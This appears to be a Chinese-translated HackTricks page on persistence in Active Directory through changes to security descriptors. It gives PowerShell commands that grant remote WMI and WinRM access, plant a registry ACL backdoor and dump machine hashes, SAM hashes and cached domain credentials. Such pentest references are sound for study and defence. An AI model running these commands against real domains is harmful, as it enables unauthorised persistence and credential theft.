hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md

4.8 KiB
Raw Blame History

安全描述符

从零开始学习AWS黑客攻击直至成为专家通过 htARTE (HackTricks AWS Red Team Expert)

支持HackTricks的其他方式

安全描述符

安全描述符定义语言SDDL定义了用于描述安全描述符的格式。SDDL使用ACE字符串表示DACL和SACLace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

安全描述符用于存储一个对象另一个对象权限。如果您能对一个对象的安全描述符进行微小的更改,您可以获得对该对象的非常有趣的权限,而无需成为特权组的成员。

因此,这种持久化技术基于获得对某些对象的每一个所需权限的能力,以便能够执行通常需要管理员权限的任务,但无需成为管理员。

访问WMI

您可以给予用户权限远程执行WMI 使用这个

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

访问WinRM

授予用户访问winrm PS控制台的权限使用此方法

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

远程访问哈希值

通过创建一个使用 DAMPReg 后门,访问注册表转储哈希值,这样你可以随时检索计算机的哈希值SAM 以及计算机中任何缓存的 AD 凭据。因此,将这个权限授予针对域控制器计算机的普通用户非常有用:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

查看Silver Tickets学习如何使用域控制器计算机账户的哈希。

从零开始学习AWS黑客技术成为 htARTE (HackTricks AWS红队专家)

其他支持HackTricks的方式